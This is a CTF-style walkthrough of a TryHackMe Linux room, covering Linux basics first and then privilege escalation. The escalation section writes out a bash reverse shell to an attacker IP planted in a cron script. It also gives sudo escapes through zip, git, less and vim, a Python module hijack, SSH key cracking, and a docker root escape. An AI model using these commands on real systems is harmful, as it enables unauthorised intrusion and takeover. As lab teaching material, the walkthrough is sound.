Linux Agency TryHackme Writeup
By Shamsher Khan, This is a Writeup of Tryhackme room “Linux Agency”
Welcome to Linux Agency. Agent 47, this is where you will need to go through several tests concerning linux fundamentals and privilege escalation techniques.
This room is proudly made by 0z09e and Xyan1d3
If you enjoy this room, please let us know by tagging us on Twitter. You may also contact us in case of some unintended routes or bugs, and we will be happy to resolve them.
Please wait about 1 minute before SSH’ing into the box.
SSH Username : agent47
SSH Password : 640509040147
Each flag found will serve as the password for the next user. The flag includes the username of the next user that is part of this challenge. The Flag format is : username{md5sum}
The order of users: agent47 → mission1 → mission30 will be part of Task 3: Linux Fundamentals.
After those missions, the next levels will be in Task 4: Privilege Escalation.
SSH into the box as agent47
ssh agent47@10.10.188.218Agent 47, we are ICA, the Linux Agency. We will test your Linux Fundamentals. Let’s see if you can pass all these challenges of basic Linux. The password of the next mission will be the flag of that mission. Example: mission1{1234567890} will be the password for the mission1 user.
Important Note:-
Find directory name
find / -type d -name "mission1" 2>/dev/nullFind File name
find / -type f -name "mission1" 2>/dev/nullFind Single word in whole system
grep -r "mission1" / 2>/dev/nullFind word in hidden folder
grep -r mission1 * .[^.]* 2>/dev/nullQuestion 1. What is the mission1 flag?
Let’s go try every method here one by one
Now find a string “mission1” in hidden directory Example:- .folder
So Now we Have
User => mission1
password => mission1{17********************f0}
Now we turn into mission1 user. Lets find mission 2 flag
Question 2. What is the mission2 flag?
So Now we Have
User => mission2
password => mission2{8a********************0d}
Now we turn into mission2 user. Lets find mission 3 flag
Question 3. What is the mission3 flag?
So Now we Have
User => mission2
password => mission3{ab********************76}
Now we turn into mission3 user. Lets find mission 4flag
Question 3. What is the mission4 flag?
try nano flag.txt
Question 4. what is mission5 flag
Question 5. what is mission6 flag
Question 6. what is mission7 flag
Question 7. what is mission8 flag
Question 8. what is mission9 flag
Question 9. what is mission10 flag
Question 10. what is mission11 flag
Question 11. what is mission12 flag
Hint says EVS that menas Environment system
Question 12. what is mission13 flag
Question 13. what is mission14 flag
Question 14. what is mission15 flag
Question 15. what is mission16 flag
Hex to Text convert
Question 16. what is mission17 flag
its look like binary file because of ELF word in file
Question 17. what is mission18 flag
So its Java file
Question 18. what is mission19 flag
Question 19. what is mission20 flag
Question 20. what is mission21 flag
In the deploy machine there is no python tool so copied the code and run on own kali linux , and then run program
flag = ">: :<=ab(d76dfe2210fak1gge5e61`kgbj`bk5c0."
for i in range(len(flag)):
flag = (flag[:i] + chr(ord(flag[i]) ^ ord("S")) +flag[i + 1:]);
print(flag[i], end = "");
print()
Question 21. what is mission22 flag
Get TTY Shell
script -qc /bin/bash /dev/null
Question 22. what is mission23 flag
Question 23. what is mission24 flag
Question 24. what is mission25 flag
Question 25. what is mission26 flag
su mission26
exit
su mission26Question 26. what is mission27 flag
Question 27. what is mission28 flag
Question 28. what is mission29 flag
Question 29. what is mission30 flag
What is viktor’s Flag?
Task 4. Privilege Escalation
What is dalia’s flag?
Let’s find suspicious file in system. when we review /etc/crontabs, something looks like interesting:
Now Check this script, and also we have permission to execute this script and cronjob per minute. One more thing, 47.sh script is same with the output of the decode of the base64 decode.
Let’s add our reverse shell here
Now start netcat listener
#!/bin/bash
bash -i >& /dev/tcp/10.2.12.26/4444 0>&1
you have only 30 seconds to add shell and get reverse shell otherwise your 47.sh file will be reset and you need add shell again
BOOM ! we got shell
tty shell
But its not proper interactive shell . To get tty shell we do this kind of things
- The first thing: to do is use script -qc /bin/bash /dev/null, which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell.
-Step two is: export TERM=xterm — this will give us access to term commands such as clear.
-Finally (and most importantly) we will background the shell using Ctrl + Z. Back in our own terminal we use stty raw -echo; fg. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.
-Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.
What is silvio’s flag?
We have sudo rights
Run as silvio with sudo, you’ll gain silvio:
TF=$(mktemp -u)
sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'
What is reza’s flag?
We have sudo rights again for another command
sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p
python3 -c 'import pty;pty.spawn("/bin/bash")'
What is jordan’s flag?
When review the sudo rights, we see /opt/scripts/Gun-Shop.py script. If we execute it, we get a message which there is no shop module in the below:
But we can add this module to a directory like /tmp which each user and services access:
You can do whatever you want. You can try to get a revershell or bindshell. Hereby the most significant point is the right which /opt/scripts/Gun-Shop.py script runs with jordan permission:
Run as jordan with sudo /opt/scripts/Gun-Shop.py: sudo -u jordan PYTHONPATH=/tmp/shop/ /opt/scripts/Gun-Shop.py
What is ken’s flag?
Check sudo rights: https://gtfobins.github.io/gtfobins/less/#sudo
Run as ken: sudo -u ken less /etc/profile
Add !/bin/sh to the page which popped up.
What is sean’s flag?
Check the sudo rights one more time: https://gtfobins.github.io/gtfobins/vim/#sudo -> (a)
Run as sean: sudo -u sean vim -c ‘:!/bin/sh’
script -qc /bin/bash /dev/null
What is penelope’s flag?
What is maya’s flag?
the owner of base64 file is maya
Check it on gtfobins: https://gtfobins.github.io/gtfobins/base64/#sudo
What is robert’s Passphrase?
Check old_robert_ssh directory:
Copy id_rsa with scp on your local machine, convert id_rsa into hash using /usr/share/john/ssh2john and finally crack it with john like in the below
What is user.txt?
Use ss of network tool to monitorize ports on victim machine: ss -tulpn
Number of port 2222 looks like handful:
Sudo Security Bypass room
(https://tryhackme.com/room/sudovulnsbypass) for Sudo Security Bypass on exploit-db (https://www.exploit-db.com/exploits/47502) and also you can check here: https://gtfobins.github.io/gtfobins/bash/#sudo.
Now we are root with privileges:
What is root.txt?
We check users on the system but mission users and others don’t appear:
./docker ps -a
./docker image ls
./docker run -v /:/mnt --rm -it mangoman chroot /mnt sh
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
